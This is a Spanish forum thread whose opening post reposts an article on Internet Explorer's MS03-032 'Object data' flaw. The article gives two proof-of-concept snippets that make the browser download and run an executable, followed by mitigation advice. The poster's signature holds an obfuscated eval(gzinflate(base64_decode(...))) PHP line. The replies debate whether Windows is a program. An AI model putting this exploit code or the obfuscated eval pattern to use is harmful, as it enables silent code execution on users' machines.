PHP-Hispano.net Comunidad hispana de desarrollo web

Contacto | #php_para_torpes | Enlázanos | ¿Quiénes somos?

10 usuarios Online (0)

Darse de alta en la web | Recuperar password   
Inicio / Foros / Javascript / Mocosoft y sus bugs..

Mocosoft y sus bugs..

8 respuestas 2324 visitas Categoría Javascript

Mocosoft y sus bugs..

Avatar de yosolito

Nivel 5 (1004 posts)

* * * * * * *

1 Agradecimientos

#0 Offline yosolito 15 dic 03
Ya se ke tal vez esto ha sido hace tiempo, pero me parece curioso..... XD
[][][][][][][][][][][][][][]

Demostración del fallo \"Object data\" del Internet Explorer MS03-032

Debido a que la gente de Microsoft una vez mas ha cometido un grave error, el parche MS03-032 que en un principio fue publicado para solventar este problema, ha resultado ser totalmente inútil, puesto que con pequeñas variantes, el fallo sigue existiendo.

En las siguientes demostraciones se ejecutará y descargará en \"c:\\\" un archivo llamado \"fuego.exe\", que es totalmente inofensivo, para cerrarlo sólo tienes que pulsar \"Esc\"

La explicación completa sobre cómo reproducir el fallo será publicada cuando exista una solución definitiva al problema.

Ejemplo 1: Sólo funcionará si tenemos la \"Secuencia de comandos ActiveX\" activada.

Este ejemplo se basa en el código original, que publico el grupo Eyee.
El código es este:
<script>
&nbspvar oPopup = window.createPopup();
&nbspfunction showPopup() {
&nbspoPopup.document.body.innerHTML = \"<object data=fuego.php>\";
&nbspoPopup.show(0,0,1,1,document.body);
}
&nbspshowPopup()
</script>



Ejemplo 2: Funcionará aunque desactivemos la \"Secuencia de comandos ActiveX\".

Esta modificación se basa en un script de GreyMagic de febrero del 2002 en el cual se demuestra la forma de ejecutar comandos sin utilizar Active Scripting o ActiveX.
Ésta es la dirección de aquel anuncio: http://greymagic.com/adv/gm001-ie/
El código quedaría así:
<span datasrc=\"#oExec\" datafld=\"exploit\" dataformatas=\"html\"></span>
<xml id=\"oExec\">
<security>
<exploit>
<![CDATA[
<object id=\"oFile\" data=\"fuego.php\"></object>
]]>
</exploit>
</security>
</xml>



Para evitar el ataque del primer ejemplo debemos desactivar la \"Secuencia de comandos ActiveX\", esto se hace en :

Internet Explorer>>Herramientas>>Opciones de Internet,>>Seguridad>> Nivel personalizado>>Secuencias de comandos ActiveX>>Descativar

Aunque personalmente no creo que desactivar los ActiveX sea una solución puesto que sin los activeX no podremos acceder a muchas de las webs, y como veomos con el segundo ejemplo, no sirve de nada desactivarlos.

Para evitar el ataque del segundo ejemplo, debemos desactivar los controles ActiveX , esto se hace en :

Internet Explorer>>Herramientas>>Opciones de Internet>>Seguridad>> Nivel personalizado>>Controles y complementos de ActiveX>>Ejecutar controles y complementos de ActiveX>>Desactivar.

Si la solución anterior no era buena, ésta es peor, tampoco te la recomiendo.

A falta del parche definitivo de Microsoft, lo mas conveniente es tener instalado un buen antivirus y un buen firewall. Muchos antivirus detectarán el script que trata de descargar el ejecutable en tu máquina. En caso de que se descargue un virus, lo detectarán cuando se trate de ejecutar, y si se trata de un programa tipo troyano, podemos pararlo con el firewall.

Por supuesto mucho mejor que todo esto es utilizar otro navegador, cualquiera menos el Internet Explorer :)

Links

Aviso original: http://www.eeye.com/html/Research/Advisories/AD20030820.html
Parche fallido de Microsoft (MS03-032): http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-032.asp
Información y ejemplos en español (Hispasec): http://www.hispasec.com/unaaldia/1778

Texto publicado en:
http://cyruxnet.com.ar
ATENCIÓN !!
Puedes copiar y distribuir este texto siempre y cuando no lo modifiques y menciones la fuente.
Este texto está hecho con intención didáctica, no nos hacemos responsables del mal uso que se haga de lo aquí explicado
[][][][][][][][][][][][][][]
Hum.....
Ke ideas mas malas se le ocurren a uno despues de ver esto......
jijijijiji

eval(gzinflate(base64_decode('s7fjSk3OyFdQt0myc3eMtNFPslNIzVEoLE1VyMlXyElN1FO35rKxBwA=')));

Re: Mocosoft y sus bugs..

Avatar de FeDeXR

Nivel 1 (1 posts)

* * * * * * *

0 Agradecimientos

#1 Offline Ex-usuario 01 abr 07 0 personas consideran útil este post.
Eso no es Windows... eso es IE XD

Windows no tiene bugs.. Porque es un sistema operativo, no un programa!..
FireFox El mejor

IE es el bugoso...

Yo tengo windows y esos scripts no me hacen nada porque desinstalé IE... Entonces no podemos decir \"Windows y sus bugs\"

Re: Mocosoft y sus bugs..

Avatar de NeoN

Nivel 1 (27 posts)

* * * * * * *

1 Agradecimientos

#2 Offline Ex-usuario 03 abr 07 0 personas consideran útil este post.
\"Windows no tiene bugs..\"

Fumas algo raro no?

Re: Mocosoft y sus bugs..

Avatar de Nahuel

Nivel 1 (9 posts)

* * * * * * *

0 Agradecimientos

#3 Offline Ex-usuario 03 abr 07 0 personas consideran útil este post.
\"Porque es un sistema operativo, no un programa!\"

???????????????????????????????????????????????????????????????? Y qué es un OS?. bueno, según el wiki:

\"Un sistema operativo (SO) es un conjunto de programas destinados a permitir la comunicación del usuario con una computadora y gestionar sus recursos de manera eficiente. Comienza a trabajar cuando se enciende el ordenador, y gestiona el hardware de la máquina desde los niveles más básicos.\"

Por si no quedo claro aca coloco el último bug en Windows Vista:

http://www.determina.com//security.research/vulnerabilities/ani-header.html

Saludos.

Re: Mocosoft y sus bugs..

Avatar de Falopy

Nivel 1 (26 posts)

* * * * * * *

0 Agradecimientos

#4 Offline Falopy 30 abr 07 0 personas consideran útil este post.
alo, alo me paseaba por la seccion de java.. que generalmente ps ni la entiendo y me tope con este post... alla arriba dicen \"Windows no es un progrlama es un sistema operativo\" Wtf como suelo decir... ya le es explicaron que evidentemetne un O.S. es un programa obiamente lo es digo la enseñansa Basica de computacion te lo dice... si no ps mi maestro de compu (pobre anciano) me enseño mal si no ps wiki tambien lo dice, asi como :
la seccion de programas de las tiendas de computacion, los tianguis o mercaditos piratas, la poderosa BIBILIA DE WONDOWS, entre otras cosas. antes que nada y lo que quiero recalcar es una falta de atencion a lo que leen. el amigo Nahuel pone de titulo al post [b] Mocosoft y sus bugs..
[/b] jamas dijo \"EL PROGRAMA WINDOWS Y SUS BUGS\" o si?
chequenle, chequenle...y los fumados son los que afirman que windows no es un programa
Pd : alguien podira decirme que otra cosa en el ramo de la computacion tiene bugs? un hardware? un farmework? u ipod? =S
selos dejo de tarea XD

Re: Mocosoft y sus bugs..

Avatar de Nahuel

Nivel 1 (9 posts)

* * * * * * *

0 Agradecimientos

#5 Offline Ex-usuario 03 may 07 0 personas consideran útil este post.
heee???, yo no puse ese titulo, el thread fue iniciado por \"yosolito\" y el que dijo que Windows no tiene bugs fue FeDeXR, yo solo aclare que Windows ademas de ser un OS es un programa y como tal esta lleno de bugs.

Saludos.

Re: Mocosoft y sus bugs..

Avatar de Falopy

Nivel 1 (26 posts)

* * * * * * *

0 Agradecimientos

#6 Offline Falopy 04 may 07 0 personas consideran útil este post.
Santa Macarena que nos amapara.... hablando de no prestar atencion XD haha eh caido en mi propio agujero no creen? pero valla la situacion es esa Windows es un programa eso ya quedo claro, pero ahora yo me pregunto...tenemos años conociendo Windows, y losmismos añós sabiendo de fallos y bugs.. la pregunta es ¿es a caso que devemos atenernos a eso? osea no habra nunca mejoras? o por que los fallos siguen y siguen?
yo creo que al fin y al cabo por ser un PROGRAMA programado por personas jamas podra salir algoperfecto o si?

Re: Mocosoft y sus bugs..

Avatar de Gulphora

Nivel 2 (162 posts)

* * * * * * *

0 Agradecimientos

#7 Offline Gulphora 04 may 07 0 personas consideran útil este post.
Pregunta estúpida... se PUEDE desinstalar IE?
Sorprendida que me hallo...

Solo hay dos cosas infinitas: el universo y la estupidez humana.

Re: Mocosoft y sus bugs..

Avatar de Nahuel

Nivel 1 (9 posts)

* * * * * * *

0 Agradecimientos

#8 Offline Ex-usuario 07 may 07 0 personas consideran útil este post.
Falopy, voy a intentar dar mi opinion sobre lo que decis.

Yo creo que mejoras en cada versión de Windows hay...pero también en cada version hay mas bugs. El problema que tiene microsoft es, segun mi opinion, que parchean y parchean y parchean, etc, etc, etc, incluso fixeando algunos bugs han agregado más bugs todavia o incluso peor, no solucionaron nada!. En mi opinion, tendrian que trabajar de una manera mas seria y no solo adornar un XP con un nuevo theme y sacar a la venta Windows Vista!. Fallos tendran siempre los OS, incluso los que se jactan de muy seguros como OpenBSD (del cual hace poco aparecio un nuevo exploit, el segundo en 10 años), pero si se trabaja conciente sobre lo que se esta haciendo y no solo se piensa en el dinero que se puede ganar con ello creo que podrían hacer un buen OS.

Vos preguntas si un programa puede salir perfecto?....pues no, pero si puede salir con minimas fallas.

Espero no haber escrito estupideses.

Saludos.

Responder mensaje

Para poder participar debes ser un usuario registrado de PHP-Hispano. :: Deseo darme de alta en esta comunidad ::
Login / Password   

php-hispano.net 2002 - 2013 | XHTML 1.0
Datos Legales | Webmaster